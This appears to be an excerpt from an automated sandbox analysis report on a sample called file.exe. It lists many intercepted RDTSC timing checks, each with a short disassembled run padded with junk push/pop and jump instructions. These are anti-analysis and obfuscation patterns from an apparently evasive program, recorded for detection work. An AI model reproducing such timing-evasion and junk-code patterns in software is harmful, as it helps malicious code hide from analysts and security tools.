Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EBB65 second address: 11EBB6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F34C4 second address: 11F34CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F34CA second address: 11F34CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F34CE second address: 11F34F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E506DD0Eh 0x00000007 jmp 00007FD0E506DD0Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jns 00007FD0E506DD06h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F34F5 second address: 11F3502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F3502 second address: 11F3511 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E506DD0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F3511 second address: 11F3531 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E4E9B9F9h 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F1D36 second address: 11F1D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F1D44 second address: 11F1D53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E4E9B9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F1E9A second address: 11F1E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F1E9E second address: 11F1EC8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FD0E4E9B9F2h 0x0000000c jng 00007FD0E4E9B9EEh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F1EC8 second address: 11F1ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F2018 second address: 11F201C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119EF49 second address: 119EF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119EF4D second address: 119EF51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F25B2 second address: 11F25B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F25B8 second address: 11F25BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F26EF second address: 11F26F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F26F5 second address: 11F26F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F26F9 second address: 11F270C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD0E506DD0Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F270C second address: 11F2712 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F2712 second address: 11F2721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0E506DD0Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F2721 second address: 11F2725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F3199 second address: 11F319F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F319F second address: 11F31A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F31A5 second address: 11F31AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F31AE second address: 11F31B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F31B4 second address: 11F31C6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD0E506DD06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F31C6 second address: 11F31CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F31CE second address: 11F31D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F639B second address: 11F63A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F63A1 second address: 11F63BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD0E506DD13h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F63BF second address: 11F63C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F63C3 second address: 11F63D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD0E506DD06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F63D3 second address: 11F63F1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD0E4E9B9E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FD0E4E9B9EEh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F63F1 second address: 11F63FF instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD0E506DD06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F5AC0 second address: 11F5AD7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD0E4E9B9EEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F5AD7 second address: 11F5ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F5ADB second address: 11F5ADF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F601B second address: 11F6020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F6020 second address: 11F605B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E4E9B9F0h 0x00000007 push ecx 0x00000008 jmp 00007FD0E4E9B9F8h 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jne 00007FD0E4E9B9E6h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F605B second address: 11F6062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F6062 second address: 11F606C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD0E4E9B9F2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F606C second address: 11F6072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FC4CB second address: 11FC4CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FC619 second address: 11FC61F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FC61F second address: 11FC625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FCD79 second address: 11FCD88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD0E506DD06h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FD30F second address: 11FD314 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FD314 second address: 11FD330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FD0E506DD06h 0x00000011 jmp 00007FD0E506DD0Bh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FD330 second address: 11FD334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FDC0E second address: 11FDC22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007FD0E506DD0Ah 0x0000000b pop esi 0x0000000c pushad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FDC22 second address: 11FDC32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jnc 00007FD0E4E9B9E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FDC32 second address: 11FDC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FD0E506DD06h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FDC41 second address: 11FDC45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FDEEE second address: 11FDEF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FDEF4 second address: 11FDEF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1207222 second address: 1207234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0E506DD0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1207234 second address: 1207238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1207238 second address: 120723E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120723E second address: 1207244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12073A5 second address: 12073A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12074E5 second address: 12074FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FD0E4E9B9E6h 0x00000009 jg 00007FD0E4E9B9E6h 0x0000000f jne 00007FD0E4E9B9E6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1212CE1 second address: 1212CE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1212CE5 second address: 1212D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FD0E4E9B9FDh 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FD0E4E9B9F5h 0x00000015 push eax 0x00000016 push edx 0x00000017 jc 00007FD0E4E9B9E6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12116FB second address: 1211701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1211701 second address: 1211705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1211705 second address: 121170E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1211A19 second address: 1211A1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1211D03 second address: 1211D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1211D07 second address: 1211D17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD0E4E9B9EAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1210BEE second address: 1210C36 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD0E506DD1Eh 0x00000008 jmp 00007FD0E506DD18h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FD0E506DD0Ah 0x00000017 jmp 00007FD0E506DD10h 0x0000001c popad 0x0000001d jno 00007FD0E506DD08h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1210C36 second address: 1210C42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FD0E4E9B9E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1210C42 second address: 1210C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1210C46 second address: 1210C4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1210C4C second address: 1210C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FD0E506DD06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1210C5C second address: 1210C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1210C60 second address: 1210C64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121ABD0 second address: 121ABEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0E4E9B9F8h 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122BE38 second address: 122BE49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD0E506DD0Ah 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12347B3 second address: 12347B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12347B9 second address: 12347D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E506DD10h 0x00000007 jns 00007FD0E506DD06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12347D3 second address: 12347F8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FD0E4E9B9F3h 0x00000008 ja 00007FD0E4E9B9E6h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007FD0E4E9B9E6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12347F8 second address: 12347FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124458A second address: 1244594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124353D second address: 1243553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E506DD12h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1243553 second address: 1243559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1243559 second address: 1243590 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E506DD0Ch 0x00000007 jng 00007FD0E506DD1Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007FD0E506DD16h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1243590 second address: 1243596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12442B9 second address: 12442D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD0E506DD11h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12442D3 second address: 12442DA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1248010 second address: 1248014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1248014 second address: 124801A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12519DD second address: 1251A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007FD0E506DD18h 0x0000000f jmp 00007FD0E506DD0Ch 0x00000014 popad 0x00000015 jl 00007FD0E506DD0Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1265283 second address: 126528B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1274CAC second address: 1274CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1274E2D second address: 1274E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD0E4E9B9ECh 0x0000000a jns 00007FD0E4E9B9E6h 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12750A6 second address: 12750B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD0E506DD06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12750B2 second address: 12750C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jc 00007FD0E4E9BA0Eh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12750C1 second address: 12750CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD0E506DD06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12750CD second address: 12750DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD0E4E9B9E6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12750DC second address: 12750E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127533F second address: 127536F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0E4E9B9EFh 0x00000009 popad 0x0000000a jp 00007FD0E4E9B9F8h 0x00000010 jmp 00007FD0E4E9B9F2h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12754E0 second address: 12754E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12757A7 second address: 12757B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
